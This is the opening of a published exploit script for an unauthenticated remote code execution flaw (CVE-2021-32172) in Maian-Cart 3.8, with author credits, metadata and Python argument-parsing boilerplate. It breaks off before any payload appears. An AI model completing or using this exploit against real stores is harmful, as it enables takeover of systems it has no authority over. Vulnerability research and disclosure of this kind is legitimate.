Authored by DreyAnd, purpl3

Maian-Cart version 3.8 unauthenticated remote code execution exploit.

advisories | CVE-2021-32172

# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172

#!/usr/bin/python3

import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()

#args

host = sys.argv[1]
directory = sys.argv[2]

#CREATE THE FILE

print("